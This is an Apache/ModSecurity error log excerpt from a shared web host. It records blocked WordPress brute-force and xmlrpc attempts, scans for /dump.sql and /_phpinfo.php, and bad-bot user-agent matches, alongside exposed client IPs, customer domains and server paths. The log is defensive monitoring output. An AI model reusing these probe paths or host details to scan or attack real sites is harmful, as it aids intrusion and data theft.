[Tue May 26 14:42:31.471114 2026] [security2:error] [pid 636820:tid 637029] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj_6_r6oOphPch7B-B2QAAAE8"]
[Tue May 26 14:42:32.338542 2026] [security2:error] [pid 636820:tid 636872] [remote 74.7.241.58:50418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVkAK_r6oOphPch7B-B-gAAQTM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:42:32.371377 2026] [security2:error] [pid 636820:tid 637009] [client 45.84.107.174:6109] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "veganfoodindia.com"] [uri "/wp-content/plugins/mojo-marketplace-wp-plugin/readme.txt"] [unique_id "ahVkAK_r6oOphPch7B-B-wAAADs"]
[Tue May 26 14:42:33.387152 2026] [security2:error] [pid 636820:tid 637006] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkAK_r6oOphPch7B-CCgAAADg"]
[Tue May 26 14:42:35.021479 2026] [security2:error] [pid 636820:tid 636984] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkAq_r6oOphPch7B-CRQAAACI"]
[Tue May 26 14:42:36.937057 2026] [security2:error] [pid 636820:tid 636966] [client 43.172.194.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVkBK_r6oOphPch7B-CegAAABA"]
[Tue May 26 14:42:37.540947 2026] [security2:error] [pid 636820:tid 636999] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkBa_r6oOphPch7B-CjAAAADE"]
[Tue May 26 14:42:39.730718 2026] [security2:error] [pid 636820:tid 637045] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkB6_r6oOphPch7B-C1wAAAF8"]
[Tue May 26 14:42:41.624989 2026] [security2:error] [pid 636820:tid 637072] [client 202.141.83.254:19804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkCa_r6oOphPch7B-DDQAAAHo"]
[Tue May 26 14:42:41.625151 2026] [security2:error] [pid 636820:tid 637072] [client 202.141.83.254:19804] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkCa_r6oOphPch7B-DDQAAAHo"]
[Tue May 26 14:42:41.768086 2026] [security2:error] [pid 636820:tid 636961] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkCa_r6oOphPch7B-DBgAAAAs"]
[Tue May 26 14:42:43.228197 2026] [autoindex:error] [pid 636820:tid 637057] [client 62.60.130.227:49424] AH01276: Cannot serve directory /home2/svijakqj/dglmmm.org.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:42:43.687480 2026] [security2:error] [pid 636820:tid 637032] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkC6_r6oOphPch7B-DPwAAAFI"]
[Tue May 26 14:42:43.755337 2026] [security2:error] [pid 636820:tid 637052] [client 62.60.130.227:49424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahVkC6_r6oOphPch7B-DSwAAAGY"]
[Tue May 26 14:42:44.090979 2026] [security2:error] [pid 636820:tid 637031] [client 62.60.130.227:57304] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDK_r6oOphPch7B-DVgAAAFE"]
[Tue May 26 14:42:44.423368 2026] [security2:error] [pid 636820:tid 637041] [client 62.60.130.227:64130] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDK_r6oOphPch7B-DXQAAAFs"]
[Tue May 26 14:42:44.763930 2026] [security2:error] [pid 636820:tid 637033] [client 62.60.130.227:49294] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDK_r6oOphPch7B-DZwAAAFM"]
[Tue May 26 14:42:45.100501 2026] [security2:error] [pid 636820:tid 637020] [client 62.60.130.227:50956] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDa_r6oOphPch7B-DbgAAAEY"]
[Tue May 26 14:42:45.440569 2026] [security2:error] [pid 636820:tid 636989] [client 62.60.130.227:58847] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDa_r6oOphPch7B-DcgAAACc"]
[Tue May 26 14:42:45.777974 2026] [security2:error] [pid 636820:tid 637048] [client 62.60.130.227:63108] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDa_r6oOphPch7B-DfgAAAGI"]
[Tue May 26 14:42:46.244322 2026] [security2:error] [pid 636820:tid 637066] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkDa_r6oOphPch7B-DhQAAAHQ"]
[Tue May 26 14:42:47.863635 2026] [security2:error] [pid 636820:tid 637048] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkD6_r6oOphPch7B-DugAAAGI"]
[Tue May 26 14:42:49.986808 2026] [security2:error] [pid 636820:tid 636984] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkEa_r6oOphPch7B-D-gAAACI"]
[Tue May 26 14:42:50.442482 2026] [security2:error] [pid 636820:tid 636933] [remote 13.203.52.35:47112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.52.203.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVkEq_r6oOphPch7B-EDQAAUHA"]
[Tue May 26 14:42:51.900041 2026] [security2:error] [pid 636820:tid 637072] [client 202.141.83.254:19938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkE6_r6oOphPch7B-EQwAAAHo"]
[Tue May 26 14:42:51.900450 2026] [security2:error] [pid 636820:tid 637072] [client 202.141.83.254:19938] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkE6_r6oOphPch7B-EQwAAAHo"]
[Tue May 26 14:42:52.230850 2026] [security2:error] [pid 636820:tid 637009] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkE6_r6oOphPch7B-EQAAAADs"]
[Tue May 26 14:42:52.663075 2026] [security2:error] [pid 636820:tid 637038] [client 114.119.139.102:52167] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "crusties.agsnails.com"] [uri "/ucxcuo/barbados-cricket-association-2020"] [unique_id "ahVkFK_r6oOphPch7B-EWgAAAFg"], referer: https://crusties.agsnails.com/ucxcuo/barbados-cricket-association-2020
[Tue May 26 14:42:53.950543 2026] [security2:error] [pid 636820:tid 636973] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkFa_r6oOphPch7B-EfgAAABc"]
[Tue May 26 14:42:54.167053 2026] [core:crit] [pid 636820:tid 636988] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:42:55.581305 2026] [security2:error] [pid 636820:tid 636958] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkF6_r6oOphPch7B-EswAAAAg"]
[Tue May 26 14:42:58.102973 2026] [security2:error] [pid 636820:tid 637001] [client 74.109.56.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkGa_r6oOphPch7B-FBQAAADM"]
[Tue May 26 14:42:58.316945 2026] [security2:error] [pid 636820:tid 637021] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkGa_r6oOphPch7B-FFwAAAEc"]
[Tue May 26 14:43:00.343246 2026] [security2:error] [pid 636820:tid 637040] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkG6_r6oOphPch7B-FcwAAAFo"]
[Tue May 26 14:43:00.963970 2026] [security2:error] [pid 636820:tid 636970] [client 64.190.76.4:56810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "acdealernoida.in"] [uri "/dump.sql"] [unique_id "ahVkHK_r6oOphPch7B-FkQAAABQ"], referer: acdealernoida.in/dump.sql
[Tue May 26 14:43:02.309211 2026] [security2:error] [pid 636820:tid 636999] [client 202.141.83.254:19935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkHq_r6oOphPch7B-FsgAAADE"]
[Tue May 26 14:43:02.309321 2026] [security2:error] [pid 636820:tid 636999] [client 202.141.83.254:19935] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkHq_r6oOphPch7B-FsgAAADE"]
[Tue May 26 14:43:02.559577 2026] [security2:error] [pid 636820:tid 637032] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkHq_r6oOphPch7B-FsQAAAFI"]
[Tue May 26 14:43:03.078667 2026] [security2:error] [pid 636820:tid 636978] [client 154.161.32.97:46556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVkHq_r6oOphPch7B-FyAAAABw"]
[Tue May 26 14:43:03.078789 2026] [security2:error] [pid 636820:tid 636978] [client 154.161.32.97:46556] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVkHq_r6oOphPch7B-FyAAAABw"]
[Tue May 26 14:43:04.064253 2026] [security2:error] [pid 636820:tid 637049] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkH6_r6oOphPch7B-F6AAAAGM"]
[Tue May 26 14:43:04.549171 2026] [security2:error] [pid 636820:tid 637000] [client 89.124.83.75:49722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.83.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVkIK_r6oOphPch7B-F_wAAADI"], referer: http://poonawallatennisacademy.com/hello-world/
[Tue May 26 14:43:04.549318 2026] [security2:error] [pid 636820:tid 637000] [client 89.124.83.75:49722] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVkIK_r6oOphPch7B-F_wAAADI"], referer: http://poonawallatennisacademy.com/hello-world/
[Tue May 26 14:43:06.576526 2026] [security2:error] [pid 636820:tid 636970] [client 31.57.184.107:51351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVkIq_r6oOphPch7B-GQwAAABQ"]
[Tue May 26 14:43:06.815649 2026] [security2:error] [pid 636820:tid 636987] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkIq_r6oOphPch7B-GQgAAACU"]
[Tue May 26 14:43:07.615701 2026] [security2:error] [pid 636820:tid 636939] [remote 209.42.20.53:38722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVkI6_r6oOphPch7B-GYwAANnY"]
[Tue May 26 14:43:08.255646 2026] [security2:error] [pid 636820:tid 637030] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkI6_r6oOphPch7B-GbgAAAFA"]
[Tue May 26 14:43:10.743818 2026] [security2:error] [pid 636820:tid 637055] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkJq_r6oOphPch7B-G7gAAAGk"]
[Tue May 26 14:43:10.916023 2026] [security2:error] [pid 636820:tid 637047] [client 195.178.110.34:35438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_phpinfo.php"] [unique_id "ahVkJq_r6oOphPch7B-G-QAAAGE"]
[Tue May 26 14:43:12.561256 2026] [security2:error] [pid 636820:tid 637010] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkKK_r6oOphPch7B-HFAAAADw"]
[Tue May 26 14:43:13.216112 2026] [security2:error] [pid 636820:tid 637031] [client 202.141.83.254:19863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkKa_r6oOphPch7B-HJwAAAFE"]
[Tue May 26 14:43:13.216232 2026] [security2:error] [pid 636820:tid 637031] [client 202.141.83.254:19863] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkKa_r6oOphPch7B-HJwAAAFE"]
[Tue May 26 14:43:14.259065 2026] [security2:error] [pid 636820:tid 636972] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkKa_r6oOphPch7B-HQgAAABY"]
[Tue May 26 14:43:14.352846 2026] [security2:error] [pid 636820:tid 636952] [client 185.191.171.8:14410] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-27th/list/"] [unique_id "ahVkKq_r6oOphPch7B-HSwAAAAI"]
[Tue May 26 14:43:14.352983 2026] [security2:error] [pid 636820:tid 636952] [client 185.191.171.8:14410] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-27th/list/"] [unique_id "ahVkKq_r6oOphPch7B-HSwAAAAI"]
[Tue May 26 14:43:16.211737 2026] [security2:error] [pid 636820:tid 637070] [client 206.198.216.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkLK_r6oOphPch7B-HigAAAHg"], referer: https://www.anujtradingco.com/
[Tue May 26 14:43:16.444510 2026] [security2:error] [pid 636820:tid 637057] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkLK_r6oOphPch7B-HhAAAAGs"]
[Tue May 26 14:43:17.408422 2026] [security2:error] [pid 636820:tid 637067] [client 206.198.216.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkLa_r6oOphPch7B-HsgAAAHU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1256228&moderation-hash=b0fedaf305cdfebcb90f0d0834507cf4
[Tue May 26 14:43:17.733712 2026] [security2:error] [pid 636820:tid 637066] [client 195.178.110.34:36932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_phpinfo.php"] [unique_id "ahVkLa_r6oOphPch7B-HuAAAAHQ"]
[Tue May 26 14:43:19.315225 2026] [security2:error] [pid 636820:tid 636987] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkLq_r6oOphPch7B-H1wAAACU"]
[Tue May 26 14:43:19.638978 2026] [security2:error] [pid 636820:tid 637019] [client 94.103.90.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVkL6_r6oOphPch7B-H6QAAAEU"], referer: http://bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:43:20.466796 2026] [security2:error] [pid 636820:tid 637071] [client 206.198.216.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkMK_r6oOphPch7B-IAQAAAHk"], referer: https://anujtradingco.com
[Tue May 26 14:43:21.063617 2026] [security2:error] [pid 636820:tid 636969] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkMK_r6oOphPch7B-IBwAAABM"]
[Tue May 26 14:43:21.918859 2026] [security2:error] [pid 636820:tid 637039] [client 94.103.90.150:50731] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "94.103.90.150" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVkMa_r6oOphPch7B-IKQAAAFk"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
